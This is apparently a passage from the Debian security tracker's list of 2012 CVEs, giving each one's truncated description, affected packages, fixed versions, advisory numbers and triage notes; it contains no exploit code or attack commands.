CVE-2012-4287 (epan/dissectors/packet-mongo.c in the MongoDB dissector in Wireshark ...)
	- wireshark 1.8.2-1
	[squeeze] - wireshark (Only affects 1.8.x)
CVE-2012-4286 (The pcapng_read_packet_block function in wiretap/pcapng.c in the ...)
	- wireshark 1.8.2-1
	[squeeze] - wireshark (Only affects 1.8.x)
CVE-2012-4285 (The dissect_pft function in epan/dissectors/packet-dcp-etsi.c in the ...)
	- wireshark 1.8.2-1 (unimportant)
	NOTE: not suitable for code injection
CVE-2012-4284 RESERVED
CVE-2011-5099 (SQL injection vulnerability in helper/popup.php in the ccNewsletter ...)
	NOT-FOR-US: Joomla addon
CVE-2012-4283 (Cross-site scripting (XSS) vulnerability in the Login With Ajax plugin ...)
	NOT-FOR-US: Login With Ajax plugin for Wordpress
CVE-2012-4282 (SQL injection vulnerability in photo.php in Trombinoscope 3.5 allows ...)
	NOT-FOR-US: Trombinoscope 3.5
CVE-2012-4281 (Multiple SQL injection vulnerabilities in Travelon Express 6.2.2 allow ...)
	NOT-FOR-US: Travelon Express 6.2.2
CVE-2012-4280 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: Free Realty 3.1-0.6
CVE-2012-4279 (Multiple SQL injection vulnerabilities in Free Realty 3.1-0.6 allow ...)
	NOT-FOR-US: Free Realty 3.1-0.6
CVE-2012-4278 (Multiple cross-site scripting (XSS) vulnerabilities in Free Realty ...)
	NOT-FOR-US: Free Realty
CVE-2012-4277 (Cross-site scripting (XSS) vulnerability in the ...)
	- smarty3 3.1.10-1
	- smarty (low)
CVE-2012-4276 (Unspecified vulnerability in Hitachi IT Operations Director 02-50-01 ...)
	NOT-FOR-US: Hitachi IT Operations Director
CVE-2012-4275 (Cross-site scripting (XSS) vulnerability in Hitachi IT Operations ...)
	NOT-FOR-US: Hitachi IT Operations Director
CVE-2012-4274 (Unspecified vulnerability in Hitachi Cobol GUI Option 06-00, 06-01 ...)
	NOT-FOR-US: Hitachi Cobol GUI Option
CVE-2012-4273 (Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 ...)
	NOT-FOR-US: 2 Click Social Media Buttons plugin for Wordpress
CVE-2012-4272 (Multiple cross-site scripting (XSS) vulnerabilities in the 2 Click ...)
	NOT-FOR-US: 2 Click Social Media Buttons plugin for WordPress
CVE-2012-4271 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Wordpress plugin
CVE-2012-4270 (Cross-site scripting (XSS) vulnerability in eFront 3.6.11 allows ...)
	NOT-FOR-US: eFront
CVE-2012-4269 (Unrestricted file upload vulnerability in eFront 3.6.11 allows remote ...)
	NOT-FOR-US: eFront
CVE-2012-4268 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: BulletProof Security plugin for WordPress
CVE-2012-4267 (Cross-site scripting (XSS) vulnerability in user/register in Sockso ...)
	NOT-FOR-US: Sockso
CVE-2012-4266 (Cross-site scripting (XSS) vulnerability in client_details.php in ...)
	NOT-FOR-US: Proman Xpress
CVE-2012-4265 (SQL injection vulnerability in category_edit.php in Proman Xpress ...)
	NOT-FOR-US: Proman Xpress
CVE-2012-4264 (Multiple cross-site scripting (XSS) vulnerabilities in the Better WP ...)
	NOT-FOR-US: Better WP Security plugin for WordPress
CVE-2012-4263 (Cross-site scripting (XSS) vulnerability in inc/admin/content.php in ...)
	NOT-FOR-US: Better WP Security plugin for Wordpress
CVE-2012-4262 (Multiple cross-site scripting (XSS) vulnerabilities in myCare2x allow ...)
	NOT-FOR-US: myCare2x
CVE-2012-4261 (SQL injection vulnerability in modules/patient/mycare2x_pat_info.php ...)
	NOT-FOR-US: myCare2x
CVE-2012-4260 (Multiple SQL injection vulnerabilities in myCare2x allow remote ...)
	NOT-FOR-US: myCare2x
CVE-2012-4259 (Cross-site scripting (XSS) vulnerability in the contacts in (1) XPhone ...)
	NOT-FOR-US: XPhone Virtual Directory
CVE-2012-4258 (Multiple SQL injection vulnerabilities in MYRE Real Estate Software ...)
	NOT-FOR-US: MYRE Real Estate Software
CVE-2012-4257 (Yaqas (Yet Another Question & Answer System) 1.0 Alpha 1 allows remote ...)
	NOT-FOR-US: Yaqas
CVE-2012-4256 (The jNews (com_jnews) component 7.5.1 for Joomla! allows remote ...)
	NOT-FOR-US: jNews for Joomla!
CVE-2012-4255 (MySQLDumper 1.24.4 allows remote attackers to obtain sensitive ...)
	NOT-FOR-US: MySQLDumper
CVE-2012-4254 (MySQLDumper 1.24.4 allows remote attackers to obtain sensitive ...)
	NOT-FOR-US: MySQLDumper
CVE-2012-4253 (Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 ...)
	NOT-FOR-US: MySQLDumper
CVE-2012-4252 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: MySQLDumper
CVE-2012-4251 (Multiple cross-site scripting (XSS) vulnerabilities in MySQLDumper ...)
	NOT-FOR-US: MySQLDumper
CVE-2012-4250 (Stack-based buffer overflow in the RequestScreenOptimization function ...)
	NOT-FOR-US: Samsung NET-i viewer
CVE-2012-4249 (The Amazon Lab126 com.lab126.system sendEvent implementation on the ...)
	NOT-FOR-US: Kindle Touch
CVE-2012-4248 (The Amazon Kindle Touch before 5.1.2 does not properly restrict access ...)
	NOT-FOR-US: Kindle Touch
CVE-2012-4247 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: phplist
CVE-2012-4246 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: phplist
CVE-2012-4245 (The scriptfu network server in GIMP 2.6 does not require ...)
	- gimp (unimportant)
	NOTE: The interface isn't designed or advertised to be secure, this is hardly a security issue in practice
CVE-2012-4244 (ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before ...)
	{DSA-2547-1}
	- bind9 1:9.8.4.dfsg-1 (bug #693015)
	[wheezy] - bind9 1:9.8.1.dfsg.P1-4.4
	- isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp)
CVE-2012-4243 RESERVED
CVE-2012-4242 (Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin ...)
	NOT-FOR-US: MF Gig Calendar
CVE-2012-4241 RESERVED
CVE-2012-4240 RESERVED
CVE-2012-4239 RESERVED
CVE-2012-4238 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: TCExam
CVE-2012-4237 (Multiple SQL injection vulnerabilities in TCExam before 11.3.008 allow ...)
	NOT-FOR-US: TCExam
CVE-2012-4236 (Cross-site scripting (XSS) vulnerability in the refresh_page function ...)
	NOT-FOR-US: Total Shop UK eCommerce
CVE-2012-4235 (The RSGallery2 (com_rsgallery2) component before 3.2.0 for Joomla! ...)
	NOT-FOR-US: Joomla addon
CVE-2012-4234 RESERVED
CVE-2012-4233 (LibreOffice 3.5.x before 3.5.7.2 and 3.6.x before 3.6.1, and ...)
	{DSA-2570-1}
	- libreoffice 1:3.5.4+dfsg-3 (low)
	- openoffice.org 1:3.3.0-1 (low)
	NOTE: Since 3.3.0 openoffice.org is a transitional source package
	NOTE: https://www.htbridge.com/advisory/HTB23106
CVE-2012-4232 (SQL injection vulnerability in admin/index.php in jCore before 1.0pre2 ...)
	NOT-FOR-US: jCore
CVE-2012-4231 (Cross-site scripting (XSS) vulnerability in admin/index.php in jCore ...)
	NOT-FOR-US: jCore
CVE-2012-4230 RESERVED
CVE-2012-4229 RESERVED
CVE-2012-4228 RESERVED
CVE-2012-4227 RESERVED
CVE-2012-4226 RESERVED
CVE-2012-4225 (NVIDIA UNIX graphics driver before 295.71 and before 304.32 allows ...)
- nvidia-graphics-drivers 304.37-1 (bug #684781) - nvidia-graphics-drivers-legacy-173xx 173.14.35-3 [squeeze] - nvidia-graphics-drivers 195.36.31-6squeeze2 [squeeze] - nvidia-graphics-drivers-legacy-173xx (Non-free not supported) NOTE: http://seclists.org/fulldisclosure/2012/Aug/4 NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3140 CVE-2012-4224 REJECTED CVE-2012-4223 REJECTED CVE-2012-4222 (drivers/gpu/msm/kgsl.c in the Qualcomm Innovation Center (QuIC) ...) - linux (Android-specific drivers) - linux-2.6 (Android-specific drivers) CVE-2012-4221 (Integer overflow in diagchar_core.c in the Qualcomm Innovation Center ...) - linux (Android-specific drivers) - linux-2.6 (Android-specific drivers) CVE-2012-4220 (diagchar_core.c in the Qualcomm Innovation Center (QuIC) Diagnostics ...) - linux (Android-specific drivers) - linux-2.6 (Android-specific drivers) CVE-2012-4219 (show_config_errors.php in phpMyAdmin 3.5.x before 3.5.2.1 allows ...) - phpmyadmin (unimportant) NOTE: Path disclosure irrelevant in Debian CVE-2012-4218 (Use-after-free vulnerability in the ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4217 (Use-after-free vulnerability in the ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4216 (Use-after-free vulnerability in the gfxFont::GetFontEntry function in ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-4215 (Use-after-free vulnerability in the ...) 
- iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4214 (Use-after-free vulnerability in the nsTextEditorState::PrepareEditor ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4213 (Use-after-free vulnerability in the nsEditor::FindNextLeafNode ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4212 (Use-after-free vulnerability in the XPCWrappedNative::Mark function in ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4211 RESERVED CVE-2012-4210 (The Style Inspector in Mozilla Firefox before 17.0 and Firefox ESR ...) - iceweasel 10.0.11esr-1 [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4209 (Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4208 (The XrayWrapper implementation in Mozilla Firefox before 17.0, ...) 
- iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4207 (The HZ-GB-2312 character-set implementation in Mozilla Firefox before ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-4206 (Untrusted search path vulnerability in the installer in Mozilla ...) - iceweasel (Windows-specific) CVE-2012-4205 (Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4204 (The str_unescape function in the JavaScript engine in Mozilla Firefox ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4203 (The New Tab page in Mozilla Firefox before 17.0 uses a privileged ...) - iceweasel (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4202 (Heap-based buffer overflow in the image::RasterImage::DrawFrameTo ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4201 (The evalInSandbox implementation in Mozilla Firefox before 17.0, ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-4200 RESERVED CVE-2012-4199 (template/en/default/bug/field-events.js.tmpl in Bugzilla 3.x before ...) 
- bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2012-4198 (The User.get method in Bugzilla/WebService/User.pm in Bugzilla 3.7.x ...) - bugzilla (Only affects 3.7 onwards) - bugzilla4 (bug #669643) CVE-2012-4197 (Bugzilla/Attachment.pm in attachment.cgi in Bugzilla 2.x and 3.x ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2012-4196 (Mozilla Firefox before 16.0.2, Firefox ESR 10.x before 10.0.10, ...) - iceweasel 10.0.10esr-1 - icedove 10.0.10-1 - iceape 2.7.10-1 [squeeze] - iceape (vulnerable code not present) [squeeze] - iceweasel (vulnerable code not present) [squeeze] - icedove (vulnerable code not present) CVE-2012-4195 (The nsLocation::CheckURL function in Mozilla Firefox before 16.0.2, ...) - iceape (Only affects 16.x release from experimental) - iceweasel (Only affects 16.x release from experimental) - icedove (Only affects 16.x release from experimental) CVE-2012-4194 (Mozilla Firefox before 16.0.2, Firefox ESR 10.x before 10.0.10, ...) - iceape 2.7.10-1 - icedove 10.0.10-1 - iceweasel 10.0.10esr-1 [squeeze] - iceape (vulnerable code not present) [squeeze] - iceweasel (vulnerable code not present) [squeeze] - icedove (vulnerable code not present) CVE-2012-4193 (Mozilla Firefox before 16.0.1, Firefox ESR 10.x before 10.0.9, ...) - iceweasel 10.0.9esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (vulnerable code not present) [squeeze] - iceweasel (vulnerable code not present) [squeeze] - icedove (vulnerable code not present) CVE-2012-4192 (Mozilla Firefox 16.0, Thunderbird 16.0, and SeaMonkey 2.13 allow ...) - iceweasel 10.0.9esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Regression not present in Squeeze) [squeeze] - iceweasel (Regression not present in Squeeze) [squeeze] - icedove (Regression not present in Squeeze) CVE-2012-4191 (The mozilla::net::FailDelayManager::Lookup function in the WebSockets ...) 
- iceweasel (Doesn't affect ESR series) CVE-2012-4190 (The FT2FontEntry::CreateFontEntry function in FreeType, as used in the ...) - iceweasel (Only affects Firefox Mobile) CVE-2012-4189 (Cross-site scripting (XSS) vulnerability in Bugzilla 4.1.x and 4.2.x ...) - bugzilla (Only affects 4.1 onwards) - bugzilla4 (bug #669643) CVE-2012-4188 (Heap-based buffer overflow in the Convolve3x3 function in Mozilla ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4187 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4186 (Heap-based buffer overflow in the nsWaveReader::DecodeAudioData ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4185 (Buffer overflow in the nsCharTraits::length function in Mozilla ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4184 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4183 (Use-after-free vulnerability in the DOMSVGTests::GetRequiredFeatures ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4182 (Use-after-free vulnerability in the nsTextEditRules::WillInsert ...) 
{DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4181 (Use-after-free vulnerability in the ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4180 (Heap-based buffer overflow in the ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4179 (Use-after-free vulnerability in the ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4178 (SQL injection vulnerability in spywall/includes/deptUploads_data.php ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-4177 (The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote ...) NOT-FOR-US: Ubisoft Uplay PC CVE-2012-4176 (Array index error in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4175 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4174 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4173 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4172 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4171 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-4170 (Buffer overflow in Adobe Photoshop CS6 13.x before 13.0.1 allows ...) NOT-FOR-US: Adobe Photoshop CS6 CVE-2012-4169 RESERVED CVE-2012-4168 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4167 (Integer overflow in Adobe Flash Player before 10.3.183.23 and 11.x ...) 
NOT-FOR-US: Adobe Flash CVE-2012-4166 REJECTED CVE-2012-4165 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4164 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4163 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4162 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4161 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4160 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4159 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4158 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4157 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4156 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4155 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4154 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4153 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4152 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4151 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4150 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4149 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) 
NOT-FOR-US: Adobe Reader CVE-2012-4148 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4147 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2011-5098 (chef-server-api/app/controllers/clients.rb in Chef Server in Chef ...) - chef 0.10.10-1 CVE-2011-5097 (chef-server-api/app/controllers/cookbooks.rb in Chef Server in Chef ...) - chef 0.10.10-1 CVE-2010-5142 (chef-server-api/app/controllers/users.rb in the API in Chef before ...) - chef 0.10.10-1 CVE-2012-4146 (Opera before 12.01 allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-4145 (Unspecified vulnerability in Opera before 12.01 on Windows and UNIX, ...) NOT-FOR-US: Opera CVE-2012-4144 (Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x ...) NOT-FOR-US: Opera CVE-2012-4143 (Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x ...) NOT-FOR-US: Opera CVE-2012-4142 (Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x ...) 
NOT-FOR-US: Opera CVE-2012-XXXX [redeclipse code execution through map files] - redeclipse 1.2-3 (bug #684143) CVE-2012-XXXX [base name disclosure] - spip 2.1.17-1 (bug #683667) [squeeze] - spip 2.1.1-3squeeze5 CVE-2012-XXXX [insecure default configuration / authentication bypass] - munin 2.0.5-1 (bug #682869) CVE-2012-4141 RESERVED CVE-2012-4140 RESERVED CVE-2012-4139 RESERVED CVE-2012-4138 RESERVED CVE-2012-4137 RESERVED CVE-2012-4136 RESERVED CVE-2012-4135 RESERVED CVE-2012-4134 RESERVED CVE-2012-4133 RESERVED CVE-2012-4132 RESERVED CVE-2012-4131 RESERVED CVE-2012-4130 RESERVED CVE-2012-4129 RESERVED CVE-2012-4128 RESERVED CVE-2012-4127 RESERVED CVE-2012-4126 RESERVED CVE-2012-4125 RESERVED CVE-2012-4124 RESERVED CVE-2012-4123 RESERVED CVE-2012-4122 RESERVED CVE-2012-4121 RESERVED CVE-2012-4120 RESERVED CVE-2012-4119 RESERVED CVE-2012-4118 RESERVED CVE-2012-4117 RESERVED CVE-2012-4116 RESERVED CVE-2012-4115 RESERVED CVE-2012-4114 RESERVED CVE-2012-4113 RESERVED CVE-2012-4112 RESERVED CVE-2012-4111 RESERVED CVE-2012-4110 RESERVED CVE-2012-4109 RESERVED CVE-2012-4108 RESERVED CVE-2012-4107 RESERVED CVE-2012-4106 RESERVED CVE-2012-4105 RESERVED CVE-2012-4104 RESERVED CVE-2012-4103 RESERVED CVE-2012-4102 RESERVED CVE-2012-4101 RESERVED CVE-2012-4100 RESERVED CVE-2012-4099 RESERVED CVE-2012-4098 RESERVED CVE-2012-4097 RESERVED CVE-2012-4096 RESERVED CVE-2012-4095 RESERVED CVE-2012-4094 RESERVED CVE-2012-4093 RESERVED CVE-2012-4092 RESERVED CVE-2012-4091 RESERVED CVE-2012-4090 RESERVED CVE-2012-4089 RESERVED CVE-2012-4088 RESERVED CVE-2012-4087 RESERVED CVE-2012-4086 RESERVED CVE-2012-4085 RESERVED CVE-2012-4084 RESERVED CVE-2012-4083 RESERVED CVE-2012-4082 RESERVED CVE-2012-4081 RESERVED CVE-2012-4080 RESERVED CVE-2012-4079 RESERVED CVE-2012-4078 RESERVED CVE-2012-4077 RESERVED CVE-2012-4076 RESERVED CVE-2012-4075 RESERVED CVE-2012-4074 RESERVED CVE-2012-4073 RESERVED CVE-2012-4072 RESERVED CVE-2012-4071 (Cross-site scripting (XSS) vulnerability in the comments 
module in the ...) NOT-FOR-US: Joomla addon CVE-2012-4070 (SQL injection vulnerability in system/src/dispatcher.php in Dir2web ...) NOT-FOR-US: Dir2Web CVE-2012-4069 (Dir2web 3.0 stores sensitive information under the web root with ...) NOT-FOR-US: Dir2Web CVE-2012-4068 (Heap-based buffer overflow in the SoapServer service in Citrix ...) NOT-FOR-US: Citrix CVE-2012-4067 [Walrus XML parsing allows document type declaration] RESERVED - eucalyptus (bug #707592) NOTE: https://github.com/eucalyptus/eucalyptus/commit/e958e60 NOTE: https://eucalyptus.atlassian.net/browse/EUCA-5277 CVE-2012-4066 (The internal message protocol for Walrus in Eucalyptus 3.2.0 and ...) - eucalyptus (bug #702388) CVE-2012-4065 (Eucalyptus before 3.1.1 does not properly restrict the binding of ...) - eucalyptus 3.1.0-9 (bug #689599) CVE-2012-4064 (Eucalyptus before 3.1.1 does not properly restrict the binding of ...) - eucalyptus 3.1.0-9 (bug #689599) CVE-2012-4063 (The Apache Santuario configuration in Eucalyptus before 3.1.1 does not ...) - eucalyptus 3.1.0-9 (bug #689599) CVE-2012-4062 RESERVED CVE-2012-4061 (Multiple SQL injection vulnerabilities in ASP-DEv XM Diary allow ...) NOT-FOR-US: ASP-DEv XM Diary CVE-2012-4060 (Multiple SQL injection vulnerabilities in ASP-DEv XM Forums RC3 allow ...) NOT-FOR-US: ASP-DEv XM Diary CVE-2012-4059 (Cross-site request forgery (CSRF) vulnerability in home/secretqtn.php ...) NOT-FOR-US: Socketmail not in Debian CVE-2012-4058 (Cross-site scripting (XSS) vulnerability in SocketMail Pro 2.2.9 ...) NOT-FOR-US: Socketmail not in Debian CVE-2012-4057 (Buffer overflow in the Player in Remote-Anything 5.60.15 allows remote ...) NOT-FOR-US: Remote-Anything not in Debian CVE-2012-4056 (SQL injection vulnerability in index2.php in Uiga Personal Portal ...) NOT-FOR-US: Uiga personal portal CVE-2012-4055 (SQL injection vulnerability in index2.php in Uiga Fan Club allows ...) 
NOT-FOR-US: Uiga Fan Club CVE-2012-4054 (Buffer overflow in the readfile function in CPE17 Autorun Killer 1.7.1 ...) NOT-FOR-US: CPE17 Autorun Killer not in Debian CVE-2012-4053 (Cross-site request forgery (CSRF) vulnerability in eZOE flash player ...) NOT-FOR-US: eZOE flash player not in Debian CVE-2012-4052 (Multiple cross-site scripting (XSS) vulnerabilities in Jease before ...) NOT-FOR-US: Jease CVE-2012-4051 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: JAMF Casper suite CVE-2007-6754 (The ipalloc function in libc/stdlib/malloc.c in jemalloc in libc for ...) NOT-FOR-US: NetBSD/FreeBSD libc CVE-2006-7252 (Integer overflow in the calloc function in libc/stdlib/malloc.c in ...) NOT-FOR-US: NetBSD/FreeBSD libc CVE-2005-4895 (Multiple integer overflows in TCMalloc (tcmalloc.cc) in gperftools ...) - google-perftools 0.7-1 CVE-2012-4047 RESERVED CVE-2012-4046 (The D-Link DCS-932L camera with firmware 1.02 allows remote attackers ...) NOT-FOR-US: D-Link DCS-932L camera CVE-2012-4045 (Multiple heap-based buffer overflows in bmp.w5s in Winamp before 5.63 ...) NOT-FOR-US: Winamp CVE-2012-4044 RESERVED CVE-2012-4043 (Cross-site scripting (XSS) vulnerability in global-protect/login.esp ...) NOT-FOR-US: Palo Alto Networks software, not in Debian CVE-2012-4042 RESERVED CVE-2012-4041 RESERVED CVE-2012-4040 RESERVED CVE-2012-4039 RESERVED CVE-2012-4038 RESERVED CVE-2012-4037 (Multiple cross-site scripting (XSS) vulnerabilities in the web client ...) - transmission 2.52-3 (bug #683380) [squeeze] - transmission (Version in Stable not affected) CVE-2012-4036 (Unrestricted file upload vulnerability in admin.php in PBBoard 2.1.4 ...) NOT-FOR-US: PBBoard CVE-2012-4035 (The new_password page in PBBoard 2.1.4 allows remote attackers to ...) NOT-FOR-US: PBBoard CVE-2012-4034 (Multiple SQL injection vulnerabilities in PBBoard 2.1.4 allow remote ...) NOT-FOR-US: PBBoard CVE-2012-4050 (Multiple unspecified vulnerabilities in Google Chrome OS before ...) 
